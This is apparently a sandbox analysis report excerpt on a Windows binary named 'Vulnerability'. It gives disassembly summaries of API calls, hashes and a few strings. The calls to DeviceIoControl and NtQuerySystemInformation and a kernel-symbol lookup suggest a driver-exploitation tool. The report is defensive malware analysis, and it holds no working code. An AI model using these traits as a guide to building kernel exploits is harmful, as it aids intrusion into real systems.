                                                                                          • Instruction Fuzzy Hash: F851A511A0D6C140EA7A6F255502578EEBA9F11BBCF98C131DEAD07795CE3CE696C330
                                                                                          APIs
                                                                                          • memset.VCRUNTIME140 ref: 00007FF7CC4230C1
                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC4230E0
                                                                                          • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7CC4230FF
                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7CC423133
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7CC423152
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC42319B
                                                                                          • ??7ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC4231D4
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423529
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC423551
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC4235B8
                                                                                            • Part of subcall function 00007FF7CC4234F0: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC42364A
                                                                                            • Part of subcall function 00007FF7CC419EF0: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F50
                                                                                            • Part of subcall function 00007FF7CC419EF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F72
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC42327A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$?sgetc@?$basic_streambuf@$?setstate@?$basic_ios@Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@??7ios_base@std@@D@std@@@1@_V?$basic_streambuf@fclosememset
                                                                                          • String ID:
                                                                                          • API String ID: 777851723-0
                                                                                          • Opcode ID: 03f68eefe71560afad815622e936b20e62a4eb20abc6b3b2f71170b9959fe72f
                                                                                          • Instruction ID: 3088cb0f4e395c8ab3b325aa9318e3c55b6f296f8c8fe5d5d65916a935277a3b
                                                                                          • Opcode Fuzzy Hash: 03f68eefe71560afad815622e936b20e62a4eb20abc6b3b2f71170b9959fe72f
                                                                                          • Instruction Fuzzy Hash: 54616E32618BC18ADB10DF64E4812AEBB71FB85B58F548126EB8C83B59DF7DD605CB10
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC4232F3
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423310
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualAlloc.KERNEL32 ref: 00007FF7CC423326
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC423341
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423362
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EA56
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EAB1
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000000,?,00007FF7CC41E399), ref: 00007FF7CC41EB2F
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                            • Part of subcall function 00007FF7CC416440: VirtualAlloc.KERNEL32 ref: 00007FF7CC4165FA
                                                                                            • Part of subcall function 00007FF7CC416440: VirtualFree.KERNEL32 ref: 00007FF7CC41662E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$V01@$Free$??6?$basic_ostream@AllocControlD@std@@@std@@DeviceInformationQuerySystemU?$char_traits@V01@@$_invalid_parameter_noinfo_noreturnmemset
                                                                                          • String ID: wasn't found$[-] Dependency $[-] Failed to resolve import
                                                                                          • API String ID: 2919487795-3042260135
                                                                                          • Opcode ID: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
                                                                                          • Instruction ID: 734af6e615bd44ebf500932a2c39d22d44f7ee2f293ba658f341bf7312e38c08
                                                                                          • Opcode Fuzzy Hash: 5991e4841fb5c1ea0f460104cb70ed3e21fab109922d1d19e610468383c6b753
                                                                                          • Instruction Fuzzy Hash: 3C61B0A5B05BC281EE14FF12E4195B9ABA5AF45FE8BD4C436CE8D07756DE3CE2418320
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: fgetc
                                                                                          • String ID:
                                                                                          • API String ID: 2807381905-0
                                                                                          • Opcode ID: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
                                                                                          • Instruction ID: dc4c869bfeac60190332baac964abdbb66a7c58f8318b49bf7a0ddcf3344b142
                                                                                          • Opcode Fuzzy Hash: e08f3c12b3a121f78b6f29c7a4dd1f19ac63be023653305744b44e4c6e2c1e59
                                                                                          • Instruction Fuzzy Hash: 22816D32B14A8199EB10DF65D4802AC7BB0FB58778FA88636DE5D53B94DF38D694C320
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
                                                                                          • Instruction ID: a782842a5b7f5f9d9ac29abc2c3223486341f3b890c41cdfee59f43ecda1ee17
                                                                                          • Opcode Fuzzy Hash: c0ddea6af8e235d7b268d53d173512a413ede755a06527274f4e7f882de79111
                                                                                          • Instruction Fuzzy Hash: 9A51BF62E08BD191EE15AF25D504278A7A0FB55BB8FA48631DEBC033C1DF78E294C350
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@W@std@@std::_
                                                                                          • String ID:
                                                                                          • API String ID: 3972169111-0
                                                                                          • Opcode ID: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
                                                                                          • Instruction ID: a6c349051a8edec77f2fd027b00a9715b21c68b19fae86464c9734532da7cedd
                                                                                          • Opcode Fuzzy Hash: 38b11574e157d7df582a17d2965fa23a478386c919f3031e92e9b312975c5df3
                                                                                          • Instruction Fuzzy Hash: 6C317222B08BC181EB14AF15F840169BB60FB88FB8F988631DA9D577A5DF3CE651C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskD@std@@Facet_Getcat@?$ctype@Getgloballocale@locale@std@@Locimp@12@RegisterV42@@Vfacet@locale@2@std::_
                                                                                          • String ID:
                                                                                          • API String ID: 3790006010-0
                                                                                          • Opcode ID: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
                                                                                          • Instruction ID: aa80dfeb54bf9f34787c97d9cbcbaaeef45938765e8840bc6e6b1e28d5aaeae5
                                                                                          • Opcode Fuzzy Hash: 0c763d4629e5f507f84c26794426aa2e0d2119a31ca62e8413d3795295dd5607
                                                                                          • Instruction Fuzzy Hash: 89318422608BC581EB14AF11E440269FB71FB88FA8F988631DA8D07769DF3CE691C710
                                                                                          APIs
                                                                                          • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7CD
                                                                                          • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C7E7
                                                                                          • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C819
                                                                                          • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C844
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00007FF7CC41C85D
                                                                                          • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C87C
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41C8A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                          • String ID:
                                                                                          • API String ID: 762505753-0
                                                                                          • Opcode ID: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
                                                                                          • Instruction ID: b9c743f024004d4c8483a2dacd3a4c32e88a0e77c89c56a042ff7abebed04a5e
                                                                                          • Opcode Fuzzy Hash: 266eed3913f5d7a1d60b4c7ee76ade89d20a8b01aa39343ad6821c4c750a169c
                                                                                          • Instruction Fuzzy Hash: 0A316622A08BC581EB54AF15E840169BB70FB88FE8F988631DA9D17765DF3CD651C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2171940698-0
                                                                                          • Opcode ID: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
                                                                                          • Instruction ID: 249f0b318877ebc518a1eaabf0849d4bfb7a915f348a56ee3cf5ae6c4ee9ed63
                                                                                          • Opcode Fuzzy Hash: a35f9bb6827678611ca5e1245bbf9eb90b5f9409e54ed511a3310ff234bf8627
                                                                                          • Instruction Fuzzy Hash: E541E261B08AC181EA20EF12A545269EB91FB48BF8F948735EE5D07BC9DE3CD241C320
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CF94
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFA2
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFDB
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFE5
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC41CFF3
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41D028
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: bc8abc273c11127fba4228d0bbd46c9ef2122486e7f3ce02c55010bcfa240a1c
                                                                                          • Instruction ID: dea467adadb2484fef41358b726d00b4eb60803f8b9e29eedd44730b4fc83a0c
                                                                                          • Opcode Fuzzy Hash: bc8abc273c11127fba4228d0bbd46c9ef2122486e7f3ce02c55010bcfa240a1c
                                                                                          • Instruction Fuzzy Hash: E741C562B1968685EE20AF11A904369EB51FB44FE8FA48631DE9D4B7C5DE7CD241C320
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          • Opcode ID: e73c8f904c68ff8df5cce68e1b0e3e6e5580f034efab5d34fbc6d5a17bcb3d93
                                                                                          • Instruction ID: 80bd4dec96e6dd195c37d213c45afbbab8231efec9be634861247cf389fe5264
                                                                                          • Opcode Fuzzy Hash: e73c8f904c68ff8df5cce68e1b0e3e6e5580f034efab5d34fbc6d5a17bcb3d93
                                                                                          • Instruction Fuzzy Hash: E741B7A1B0978181EE15BF16A4052B8EB55EB04BF4FE48632DEAD0B7D5DE3CE241C310
                                                                                          APIs
                                                                                          • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA_N_N@Z.MSVCP140 ref: 00007FF7CC41A635
                                                                                          • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A656
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC41A6CA
                                                                                          • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC41A73F
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A782
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@Vlocale@2@
                                                                                          • String ID:
                                                                                          • API String ID: 481934583-0
                                                                                          • Opcode ID: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
                                                                                          • Instruction ID: 0585114079535a4d6cecf657918af4fede480825201e916c52bb564c8aba724c
                                                                                          • Opcode Fuzzy Hash: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
                                                                                          • Instruction Fuzzy Hash: 42516C23B09A8481DB10DF1AE59023DABA0EB84FA8F558131DE9E43764CF39D582C350
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CleanupModule64Unload_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1118963909-0
                                                                                          • Opcode ID: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
                                                                                          • Instruction ID: 077112d3f33bf0e9dc73a48b92df4ce9e6bdc91964d0d39db48bbf1de73ad86e
                                                                                          • Opcode Fuzzy Hash: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
                                                                                          • Instruction Fuzzy Hash: ED2181A2A046C581EB14EF25D45937C6B72EB44FACF908031DA4E0A69ACF7DD9C4C350
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,0492492492492493,00007FF7CC41F8F6,?,?,00000000,00000000,?,00000000), ref: 00007FF7CC4200F9
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC4201A9
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID: gfffffff$gfffffff
                                                                                          • API String ID: 1934640635-161084747
                                                                                          • Opcode ID: 847be13be7db8cf1300a634f0f0caf657fd70b10d2ef20c64bbff5525a990887
                                                                                          • Instruction ID: 583a652507f4f4c677126071b7f93033e2ca3157372da43b7eece64a40dbd1fd
                                                                                          • Opcode Fuzzy Hash: 847be13be7db8cf1300a634f0f0caf657fd70b10d2ef20c64bbff5525a990887
                                                                                          • Instruction Fuzzy Hash: 7E51C472605B8581EE14EF13F441279E7A5EB48BD8F948232DA8D87B95DF3CD192C311
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417204
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417256
                                                                                            • Part of subcall function 00007FF7CC41C580: GetModuleHandleA.KERNEL32 ref: 00007FF7CC41C5D0
                                                                                            • Part of subcall function 00007FF7CC41C580: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41C5F8
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$HandleModule_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: RtlLookupElementGenericTableAvl$[!] Failed to find RtlLookupElementGenericTableAvl
                                                                                          • API String ID: 1378083526-1952825546
                                                                                          • Opcode ID: cca0c0844387f2d15681cad13ec7d8960616ed310815bd53d65b1107346a9e7b
                                                                                          • Instruction ID: 5a66c926438686ebd658ef84fb759a576ff19a8aa83df992d5ffed683f6427ae
                                                                                          • Opcode Fuzzy Hash: cca0c0844387f2d15681cad13ec7d8960616ed310815bd53d65b1107346a9e7b
                                                                                          • Instruction Fuzzy Hash: 34418562E18BC681E650EF25E441379EB61FBC47F8FA09235E69D426A5DF3CD281C710
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F90
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
